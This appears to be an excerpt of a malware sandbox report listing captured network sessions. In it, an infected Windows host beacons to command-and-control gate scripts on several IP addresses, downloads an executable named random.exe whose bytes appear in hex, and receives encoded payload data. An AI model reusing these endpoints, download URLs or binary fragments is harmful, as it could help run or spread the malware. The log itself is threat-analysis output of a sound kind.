                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        51192.168.2.1050061185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:27.566684008 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:27.692012072 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:29.231451035 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:28 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        52192.168.2.1050063185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:28.244294882 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 31 34 34 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                        Data Ascii: d1=1014445001&unit=246122658369
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:29.345205069 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:29 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        53192.168.2.1050064185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:29.465692997 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:29.585614920 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:32.213334084 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:30 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        54192.168.2.105006531.41.244.11807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:29.573822021 CET62OUTGET /files/hell911/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:30.848037958 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:49:30 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Content-Length: 2660864
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 07:14:44 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "6757ea64-289a00"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed d3 a7 12 a9 b2 c9 41 a9 b2 c9 41 a9 b2 c9 41 e2 ca ca 40 a3 b2 c9 41 e2 ca cc 40 27 b2 c9 41 e2 ca cd 40 bd b2 c9 41 b8 34 ca 40 bd b2 c9 41 b8 34 cd 40 bb b2 c9 41 b8 34 cc 40 8f b2 c9 41 e2 ca c8 40 aa b2 c9 41 a9 b2 c8 41 fa b2 c9 41 2a 34 c1 40 a8 b2 c9 41 2a 34 36 41 a8 b2 c9 41 2a 34 cb 40 a8 b2 c9 41 52 69 63 68 a9 b2 c9 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 85 59 56 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 b0 24 00 00 f2 03 00 00 00 00 00 c9 01 24 00 00 10 00 00 00 c0 24 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AAA@A@'A@A4@A4@A4@A@AAA*4@A*46AA*4@ARichAPELYVg*$$$@(dm)@%(@%%@(%p%@$.text2$$ `.rdata^$`$@@.data %%@.rsrc%@%%@@.reloc@((@B
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:30.848189116 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 48 53 8b 5d 14 8b c1 56 8b 75 18 0f bf cb 81 c6 2a 3f 18 59
                                                                                                                                                                                                                                                                                        Data Ascii: UHS]Vu*?YM}6/MWUEEKEE*?YEbE,EQTEnxEELsE1};EzE.EE6/u}uTE7K+E\mfvAE1};
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:30.848217010 CET1236INData Raw: 08 00 00 a3 e0 28 65 00 b8 d4 4c c6 73 d3 e8 33 c9 89 45 e8 a0 ec 28 65 00 04 11 c7 45 e0 00 00 00 00 88 45 ff 0f b6 c3 66 03 45 10 81 c6 0a 6d 29 1b 0f b7 c0 c7 45 f8 ba 61 00 00 89 45 c8 89 75 18 e9 fc 03 00 00 81 fa d4 4c c6 73 0f 86 85 00 00
                                                                                                                                                                                                                                                                                        Data Ascii: (eLs3E(eEEfEm)EaEuLsEP=]gME}5-lU (eECz(eE+EM(eEiLsEMEU iQTEkuU(eY48((eQTm
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:30.848228931 CET1236INData Raw: c2 1c 00 0f b6 45 fe 66 39 45 f8 75 3e 2b 75 d4 a1 e0 28 65 00 2b c2 5f 8d 8e 82 41 51 fa d3 e8 8b 4d 0c 80 e9 2d a3 e0 28 65 00 0f b6 05 ca 28 65 00 0f b6 c9 0f af c8 b8 6f c9 00 00 5e 5b 88 0d ca 28 65 00 8b e5 5d c2 1c 00 3b 55 b8 75 2a 8b 4d
                                                                                                                                                                                                                                                                                        Data Ascii: Ef9Eu>+u(e+_AQM-(e(eo^[(e];Uu*M+M(e(eof=(e_^[]:]ufMof=(e_^[]uu;u+5(ef(eE_(eo^[]E;~/MMf=(e(eM
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:30.848236084 CET1236INData Raw: 8a 4d ec 81 c7 51 96 00 00 b8 f9 24 e5 4e 89 7d 0c 2b c3 c6 45 ff 3b 89 45 e8 b2 0c 0f b6 45 0c 6b c0 64 2a d0 d2 ea 69 45 f8 f6 86 f1 2f 8b 4d 1c 89 55 f4 89 4d 1c 89 45 f8 8b 4d 14 89 4d c8 8a 45 18 8b 75 f8 0f b7 55 0c 8b 4d e8 03 ca 89 55 a4
                                                                                                                                                                                                                                                                                        Data Ascii: MQ$N}+E;EEkd*iE/MUMEMMEuUMUMEEMdjEEdM(eUMfMMMEEMMM+M(eM;vYEE3E.auNcuu6`Euu
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:30.848242044 CET1236INData Raw: 43 33 18 0f b7 c0 80 45 fc 85 89 45 dc 89 45 d0 8b 45 c4 2b 05 d0 28 65 00 89 45 c4 89 45 d4 b8 77 ff 86 6f 2b 45 b4 01 45 10 b8 3d 99 ae 6b 2b 45 a4 01 45 c0 69 45 d8 09 ab ff ff 81 6d e4 c1 18 f8 47 89 75 08 89 75 e0 89 4d 1c 0f b7 c0 89 45 d8
                                                                                                                                                                                                                                                                                        Data Ascii: C3EEEE+(eEEwo+EE=k+EEiEmGuuMEM9MMME3(eEu5(eEr,EEEERMMUiEX5(eMELE(eiEEEEJ0";
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:30.848248959 CET1236INData Raw: 03 d0 8b 45 e4 0f b7 c0 0f b7 ca 0f af c8 69 45 1c 46 ae 20 14 0f b7 f9 05 96 cc 3a 0e 89 7d 0c 0f b6 4d 0c 89 45 1c 8b 45 f4 0f b6 c0 0f af c8 69 45 f8 8b f8 24 a6 88 4d f4 89 45 f8 8b 4d 1c 8b 75 08 8b 45 18 0f bf 55 e0 89 55 b4 3b ca 8b 55 10
                                                                                                                                                                                                                                                                                        Data Ascii: EiEF :}MEEiE$MEMuEUU;UEv}E2]3EEmcEMMfMEE)EEEEUEMEuuUuEMMMMM9MEvmE+
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:30.848330021 CET1236INData Raw: b7 f0 66 8b 45 fc 81 6d 1c 06 2f 8e 06 0f b6 c0 81 6d d8 38 27 00 00 0f b6 ca 0f af c8 8b 45 f8 0f af 05 f4 28 65 00 69 d2 8f 5e 87 08 89 7d 0c 88 4d fc 69 4d f8 20 0f 73 5e a3 f4 28 65 00 0f b7 c7 05 ea f9 0d 01 89 55 10 01 45 e8 66 8b 15 ec 28
                                                                                                                                                                                                                                                                                        Data Ascii: fEm/m8'E(ei^}MiM s^(eUEf(eEMffMAn^MfiEZMf(e+EYE;MEEui2Ef(efEEEUUUUf5(euUUM;MMMu9
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:30.848365068 CET1236INData Raw: f4 8b 4d 1c a3 e0 28 65 00 8d 3c 4f e9 0a 01 00 00 8b 45 cc 39 45 b8 75 35 0f b7 4d 0c 2d 45 12 c8 16 d3 2d cc 28 65 00 8a ca d2 2d ca 28 65 00 89 45 cc 66 8b 45 fc 0f b6 c0 6b c0 2c 02 05 c4 28 65 00 2b 5d cc 88 45 fc e9 c4 00 00 00 66 8b 45 fc
                                                                                                                                                                                                                                                                                        Data Ascii: M(e<OE9Eu5M-E-(e-(eEfEk,(e+]EfEE;uAfEf)(eE(eEEEkmi_DuEWQMuME;u9M(eM+MUMMMMf(efm}ME:(eu+}E
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:30.848372936 CET1236INData Raw: 45 cc 8b 45 14 05 99 32 99 2d 66 89 15 c8 28 65 00 0f b7 d1 8b 4d 08 66 d3 3d ec 28 65 00 8b 4d e4 03 c1 03 4d 90 89 45 14 66 8b c7 98 01 05 f4 28 65 00 8b 45 10 0f b6 c0 6b c0 53 89 4d e4 b1 e6 2b 75 14 89 7d e8 89 75 f8 2a c8 0f b6 45 f0 0f b6
                                                                                                                                                                                                                                                                                        Data Ascii: EE2-f(eMf=(eMMEf(eEkSM+u}u*EuMMEEE(eE>QMUEE-lmaEuu>QuY^ioMMmf(ef-(ef)E+}UUuu
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:30.968653917 CET1236INData Raw: 89 45 a8 89 45 d0 8b 45 b8 89 4d fc 8b 4d b4 2b c1 89 45 b8 89 45 cc 8b 45 dc 2d 8f da ca 3d 89 75 f8 00 45 10 89 45 dc a1 e4 28 65 00 01 45 bc 8b 45 f4 89 75 f0 e9 64 05 00 00 0f bf 55 e8 3b 55 d8 8b 55 14 8b 75 f8 75 58 69 c7 6e fd ff ff c1 fe
                                                                                                                                                                                                                                                                                        Data Ascii: EEEMM+EEE-=uEE(eEEudU;UUuuXinuuf)E(eEEEEEE(eMmEEzEEEE;EE)MM,EE)EEfEmOMM(efmMf(


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        55192.168.2.1050067185.81.68.14780
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:30.703336954 CET264OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:32.034992933 CET257INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:31 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Content-Length: 40
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 35 32 36 62 39 30 39 36 37 61 31 62 37 35 39 39 36 34 30 35 34 64 32 30 62 37 36 65 36 66 34 66 35 37 34 31 63 31 64 62
                                                                                                                                                                                                                                                                                        Data Ascii: 526b90967a1b759964054d20b76e6f4f5741c1db


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        56192.168.2.1050068185.81.68.14780
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:32.157452106 CET284OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:32.277224064 CET10OUTData Raw: 72 57 42 2b 57 5a 5c 55 43 12
                                                                                                                                                                                                                                                                                        Data Ascii: rWB+WZ\UC
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:33.615888119 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:32 GMT
                                                                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Data Raw: 38 64 61 34 0d 0a 4e 3f 3c 6f 33 10 19 16 17 43 44 10 5b 6a 5b 55 57 57 5b 59 5d 17 46 12 58 17 6d 45 14 4c 5b 05 46 47 1e 1f 49 13 48 42 17 18 45 1b 54 53 13 18 54 0e 5c 48 15 19 19 1b 1c 57 5c 5c 51 0a 46 43 48 19 51 0a 59 01 58 03 1b 54 5b 5c 49 13 48 42 17 18 42 07 55 55 54 53 43 13 48 4c 5a 5a 43 50 5a 58 51 1b 5b 16 55 1a 40 1b 16 47 1c 15 55 00 50 55 46 5e 14 42 0d 0c 52 1c 51 0d 56 57 55 53 19 02 5e 0f 1d 17 15 19 14 1e 43 50 46 12 5b 53 07 44 18 08 59 1c 5d 0a 59 56 1a 52 0c 5c 4e 40 19 12 14 0b 57 53 56 5b 5e 0f 56 4c 43 50 55 5c 5b 51 44 47 4d 4a 5f 5f 18 5e 5a 09 57 48 5b 14 52 15 18 11 41 1b 03 0d 5a 55 5a 07 4f 59 5d 53 58 4f 52 0d 5a 1f 1b 15 16 16 44 47 55 0a 41 5c 03 43 53 4b 51 09 5b 01 59 52 55 41 0a 42 4a 01 5a 5f 14 4e 19 12 13 5a 52 0f 52 10 19 5a 4b 5e 1c 16 1c 15 16 4e 5e 5f 05 1a 43 15 5a 09 55 02 18 58 47 1f 0b 5e 1d 0d 43 57 44 11 5c 1e 5a 59 5a 4b 13 4e 17 17 5b 08 18 5a 55 59 1a 03 5d 5f 05 1d 14 49 16 44 1e 10 1b 54 58 50 11 58 10 1b 1b 5f 45 48 1b 1c 19 14 1d 05 5f 11 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: 8da4N?<o3CD[j[UWW[Y]FXmEL[FGIHBETST\HW\\QFCHQYXT[\IHBBUUTSCHLZZCPZXQ[U@GUPUF^BRQVWUS^CPF[SDY]YVR\N@WSV[^VLCPU\[QDGMJ__^ZWH[RAZUZOY]SXORZDGUA\CSKQ[YRUABJZ_NZRRZK^N^_CZUXG^CWD\ZYZKN[ZUY]_IDTXPX_EH_VVTNJX[OJDN[DDQYkl;B:?4<F[^RUEDF8=C?o?B;=A<hN9nBEFFBF]AD@V]X\HPYYL\UTWHCQWZBQ^TEDk?CDB@IQM^[@4<DBGAV9VXZE_@?<BABn43DBE9lCDBBPVj[\P[BP^AWAEQPEPj@__K[U6RY\TW@YDAn\h<FFCDBBPX]RXQWQVE9UQhZDmFBGD\HMkCRYSP^U@EVUC__U\XZDY[SMlO^DEXWW\TGl@[WSk\RXU?Z,@_K_rRArEA\G@TZZVTZX[GAECEPj@MUABkCVAM\DZi?[j9FBYBQ?8@\W\eTCh[LTjXU^UPB:WkXnSlVEQZZLElhFQCYYFVCmA^i]eTCh[LTjVXAC_kYYKVXZE^B[G[KYZjACCXUCQGQQDASXjDRGZXeP_WP
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:33.615930080 CET1236INData Raw: 41 4c 53 6b 43 0f 5e 5b 54 5b 5c 5a 14 56 5a 46 59 6e 12 07 4f 46 3a 52 07 40 03 69 15 14 43 15 1c 10 07 4d 46 0b 3e 1b 53 56 58 51 08 56 4c 56 45 49 17 5f 50 55 5b 40 0d 54 59 01 56 42 0c 59 08 1a 08 40 5a 57 5d 0a 54 0a 16 69 10 08 51 17 10 05
                                                                                                                                                                                                                                                                                        Data Ascii: ALSkC^[T[\ZVZFYnOF:R@iCMF>SVXQVLVEI_PU[@TYVBY@ZW]TiQEG_BTYXJElXPUhPSP:pPTDWNPBXB^_^FIXXXPUXACMA8@AWNeFVEE[eo9l@@ZQ[ihC_Pj@\HIiSEkTWL\PZFX_kT:FF^NT^mFSnBXEMY
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:33.615942955 CET448INData Raw: 03 06 3e 1b 10 58 43 43 0e 57 0d 54 40 4a 04 6a 16 6c 17 14 05 47 44 0d 54 59 17 44 03 57 12 08 6b 16 5e 05 57 38 40 15 5b 52 5f 65 12 5a 57 45 05 6e 0c 42 58 65 1b 16 57 5c 54 47 17 0f 6c 40 51 59 17 5b 4b 57 09 5b 43 46 5e 0f 11 0a 17 58 57 44
                                                                                                                                                                                                                                                                                        Data Ascii: >XCCWT@JjlGDTYDWk^W8@[R_eZWEnBXeW\TGl@QY[KW[CF^XWDZlEVYL\FUTW[FjGPF^Pe]TF_LUe]]UPUP[BhFWHhRBhDEBTnV^__POPGP]SZD\RQQ^YAV[]TE8@BCIWYARVFJj\TV^o^SR:XqV@TCUCMB_
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:33.615955114 CET1236INData Raw: 0d 44 07 1a 47 5c 58 55 40 59 43 51 59 6e 12 04 58 44 08 18 0f 50 32 50 5b 51 5c 02 45 0d 13 40 57 6a 40 07 0c 55 57 55 04 5d 42 51 5a 4b 04 6a 16 53 43 42 38 10 10 10 41 1b 11 53 1e 40 5b 69 15 57 5e 0d 57 0d 05 1b 53 46 12 17 59 5d 53 59 15 58
                                                                                                                                                                                                                                                                                        Data Ascii: DG\XU@YCQYnXDP2P[Q\E@Wj@UWU]BQZKjSCB8AS@[iW^WSFY]SYX^VXM_[^Z_S^SB:XAQZJCjPRYf__Q\QhFs4aJEU]S_IEMCAiMSLDiDBQCSX[hDn>8@DWLUj=BYTT\hVBnBZWZZA_mAT>ECUjP>
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:33.616023064 CET1236INData Raw: 55 55 08 17 5d 1e 06 5e 43 07 05 54 46 0e 09 50 0d 44 10 01 5b 57 16 45 5b 68 44 54 42 40 59 4e 52 17 4f 56 5d 58 16 5c 5e 4d 16 17 12 46 0f 68 5c 57 49 43 40 1d 56 5b 0a 46 51 0b 59 53 17 6a 44 0a 46 09 5e 5a 41 16 45 44 0b 51 0f 6a 40 4c 43 5c
                                                                                                                                                                                                                                                                                        Data Ascii: UU]^CTFPD[WE[hDTB@YNROV]X\^MFh\WIC@V[FQYSjDF^ZAEDQj@LC\DhU>WX[QiJ@=SWS:FANDT^mFPJB>ZZVB_kJN[kY[DFESiFFD_XO\\FMlVETTIPBU\\Nl@YYS:FTB@^^PQB_eVPQ=BVGPXXQWQl@tYSFW\RZE?DYSUQ_UR
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:33.616034985 CET1236INData Raw: 10 46 03 4d 58 1b 0c 17 43 1b 40 1b 38 33 19 16 14 10 15 14 44 12 10 42 15 41 00 54 39 57 09 5b 43 51 5f 17 13 5e 6f 3f 12 16 42 19 10 19 16 17 41 11 39 3a 3f 19 19 16 14 10 15 14 44 12 10 42 17 16 1e 3b 6c 14 46 15 17 14 11 43 11 44 42 15 12 16
                                                                                                                                                                                                                                                                                        Data Ascii: FMXC@83DBAT9W[CQ_^o?BA9:?DB;lFCDBBRVP=UP_VDQF[T_kWGZSQ<TZ@{JCXQR=BVGPX\YQP\>BChD<iDBBABPW\QSA^^R@X\A_AXTUjPSjWL[VUGhFSVE:YDCGPU
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:33.616115093 CET1236INData Raw: 6d 38 00 05 4a 6d 03 14 56 78 1b 71 51 1c 5b 6a 4e 0d 09 4b 68 6c 57 1b 03 12 6d 59 17 55 0a 58 15 40 46 59 43 57 63 06 56 01 1a 50 41 16 5f 19 6b 19 19 6b 3d 53 4a 7b 49 74 45 5a 40 53 04 1d 3f 53 1d 18 76 1b 2d 7c 4b 7a 36 18 6d 04 1c 5a 6c 1f
                                                                                                                                                                                                                                                                                        Data Ascii: m8JmVxqQ[jNKhlWmYUX@FYCWcVPA_kk=SJ{ItEZ@S?Sv-|Kz6mZlP[DleT?ZVXGD@JbPSS[l?mJaNBKbQLvLy({ilikj;P^D[FLUKOd]TAVKwX\NLQYsWRX^DWZLZXPZS/^RF_YFuTW^SSEX^RK_
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:33.616177082 CET1236INData Raw: 17 14 11 43 11 44 42 15 12 16 42 19 12 5d 57 43 00 6e 00 52 53 56 4b 53 16 0a 15 16 58 1d 44 0b 43 5a 00 08 44 18 6b 3f 17 14 11 43 11 44 42 15 12 16 42 19 12 50 58 5d 04 52 16 15 0f 19 1b 0a 47 53 47 5d 14 46 0e 04 42 58 06 42 0f 5b 08 15 45 51
                                                                                                                                                                                                                                                                                        Data Ascii: CDBB]WCnRSVKSXDCZDk?CDBBPX]RGSG]FBXB[EQAPt^Z#]TKSDT[\NwPTGQAU[FCSR6RWNJlA>kWbmnUIY]OMwH~,(enN9QMjkejVVL98=UKOvy)*2hOmBM[JeeTWi_SYE@gRST
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:33.616189003 CET1236INData Raw: 3f 50 50 03 00 61 69 04 4b 00 36 06 5a 05 33 74 07 73 4f 45 07 02 54 10 19 19 4d 44 4c 0a 15 13 30 70 5d 01 65 4f 5d 74 51 06 11 40 62 60 7f 55 70 2f 27 64 00 7e 16 6a 5b 0d 0e 50 0f 04 10 5f 45 7b 1e 16 49 0b 15 47 01 46 79 0c 43 53 17 40 07 58
                                                                                                                                                                                                                                                                                        Data Ascii: ?PPaiK6Z3tsOETMDL0p]eO]tQ@b`Up/'d~j[P_E{IGFyCS@XN]E^W\qUZvURFJ\E^PC%VTRESJ_G[F4<ABH9nBkh<FIJ8=9;CJihBEKZ[@DAXRSSZYF=hEDDA_CN@?<B@S=TZWMSZDDi=hEFF
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:33.616199970 CET1236INData Raw: 5f 1e 06 5a 07 47 15 7b 56 59 54 43 0c 5a 42 4e 12 5f 04 19 18 5a 5a 56 12 42 2c 56 58 5c 17 42 5b 7c 5a 43 01 40 73 03 44 53 4d 1f 48 5d 08 56 5b 41 55 06 42 4c 45 44 40 55 0d 5d 55 1e 1f 1e 41 4a 42 52 59 17 5a 5a 55 43 46 78 0d 41 44 4c 45 53
                                                                                                                                                                                                                                                                                        Data Ascii: _ZG{VYTCZBN_ZZVB,VX\B[|ZC@sDSMH]V[AUBLED@U]UAJBRYZZUCFxADLESYQNV[UBPBDDALBJKSZZFRA$RFFDQBCDPBgsqQOoVmq)vXGXyw3dW2oB\DQFU\STWSRPU_QUWSPXRSPQUBW(V^2gP5


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        57192.168.2.1050070185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:32.447632074 CET283OUTPOST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 185.81.68.147
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Content-type: text/html
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:32.570048094 CET6OUTData Raw: 45 5b 58 05
                                                                                                                                                                                                                                                                                        Data Ascii: E[X
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:49:33.950499058 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 23:49:33 GMT
